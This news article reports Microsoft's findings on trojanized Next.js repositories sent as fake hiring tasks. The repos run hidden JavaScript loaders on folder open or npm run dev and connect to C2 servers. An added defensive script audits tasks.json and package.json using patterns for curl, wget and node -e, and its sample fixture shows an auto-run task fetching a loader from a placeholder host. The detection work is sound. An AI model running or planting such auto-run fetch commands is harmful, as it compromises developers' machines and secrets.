Next.js developers are once again in the crosshairs as hackers seed malicious repositories disguised as legitimate projects, according to Microsoft, which said a limited set of those repos were directly tied to observed compromises.
Microsoft said the repositories use different methods to execute on developers’ machines, but all lead to the same outcome: in-memory execution of malicious JavaScript.
All of the execution paths identified by its research team are designed to trigger during the Next.js devs’ normal working routine. One, for example, abuses Visual Studio Code’s workspace automation to load files as soon as the dev opens and trusts the project.
In these cases, the variants tend to retrieve a JavaScript loader from Vercel and execute it using Node.js, then begin beaconing to attacker-controlled command-and-control (C2) infrastructure for further tasking.
Other paths involve the targeted developers running the project’s development server either directly or via npm run dev, where malicious logic embedded in trojanized assets or modified libraries (such as altered frontend files) retrieves and executes the loader. Others rely on victims starting the application’s backend, triggering preloaded logic hidden in backend modules during server initialization or module import.
Regardless of the path taken, the end result is always to register the affected device, run the JavaScript loader, and establish a connection with the attacker’s C2 infrastructure.
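The two workspace-triggered paths described above (a VS Code task that fires on folder open, and a package.json script that runs under npm run dev) can be checked before a cloned "interview project" is trusted or started. The following is an added example, not code from Microsoft's report or from the article: it audits plain-JSON tasks.json and package.json text for auto-run tasks and for inline-node, download or hard-coded-URL patterns; the modified-library path, whose logic sits in ordinary source files, is out of its scope.

```javascript
// Added example (not from the article or Microsoft's report): audit the two files that the
// VS Code and `npm run dev` execution paths depend on. A task with runOptions.runOn set to
// "folderOpen" starts when the workspace is opened and trusted. Plain JSON is assumed.
const SUSPICIOUS = [
  /\bnode\s+(-e|--eval)\b/i,    // inline JavaScript handed to node
  /\b(curl|wget)\b/i,           // shell download of a remote file
  /\beval\s*\(/i,               // runtime evaluation of strings
  /https?:\/\//i,               // any hard-coded URL in a task or script
];

// Returns one string per finding; an empty array means nothing stood out.
function auditTasksJson(text) {
  const findings = [];
  for (const task of JSON.parse(text).tasks || []) {
    const cmd = [task.command, ...(task.args || [])].filter(Boolean).join(' ');
    if (task.runOptions && task.runOptions.runOn === 'folderOpen') {
      findings.push(`tasks.json: "${task.label}" runs automatically on folder open: ${cmd}`);
    }
    if (SUSPICIOUS.some((re) => re.test(cmd))) {
      findings.push(`tasks.json: "${task.label}" has a suspicious command: ${cmd}`);
    }
  }
  return findings;
}

function auditPackageJson(text) {
  const findings = [];
  for (const [name, script] of Object.entries(JSON.parse(text).scripts || {})) {
    if (SUSPICIOUS.some((re) => re.test(script))) {
      findings.push(`package.json: script "${name}" looks suspicious: ${script}`);
    }
  }
  return findings;
}

// Constructed sample inputs; the host name is a placeholder, not a real indicator.
const SAMPLE_TASKS = JSON.stringify({
  version: '2.0.0',
  tasks: [
    { label: 'build', type: 'shell', command: 'npm run build' },
    { label: 'setup', type: 'shell', command: 'node',
      args: ['-e', "require('https').get('https://LOADER-HOST.invalid/l.js')"],
      runOptions: { runOn: 'folderOpen' } },
  ],
});
const TROJANIZED_PACKAGE = JSON.stringify({ scripts: { dev: 'node -e "require(\'./lib/init\')" && next dev' } });
console.log(auditTasksJson(SAMPLE_TASKS), auditPackageJson(TROJANIZED_PACKAGE));
```

A finding is a prompt to read the file, not proof of compromise; legitimate projects also use folderOpen tasks, so the point is to see them before the editor runs them.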
Using a separate C2 IP address and API set handed off by the initial stage, the controller retrieves a messages[] array of JavaScript tasks and executes them in memory using a separate Node interpreter to reduce on-disk artifacts.
This process also allows for data exfiltration. On developer machines, this could include anything from personal data to source code, secrets, or cloud resources.
Microsoft said the controller, besides receiving the attacker's instructions, can rotate its identifiers to stop anti-malware solutions and human defenders from spotting patterns of suspicious activity.
The controller will also obey kill-switch or shutdown commands, track the processes it spawns to prevent the victim from suspecting anything is awry based on performance issues, and report error telemetry, allowing attackers to tweak the commands that fail.
The projects are disseminated by miscreants under the guise that they are used as part of the hiring process, requiring developers to complete tasks related to job applications.
And while it’s difficult to imagine that targeted devs would complete these interview assessment tasks on a corporate machine, Microsoft warned that doing so could open up an organization to a wider compromise.
It added: “The key takeaway is that defenders should treat developer workflows as a primary attack surface and prioritize visibility into unusual Node execution, unexpected outbound connections, and follow‑on discovery or upload behavior originating from development machines.” ®
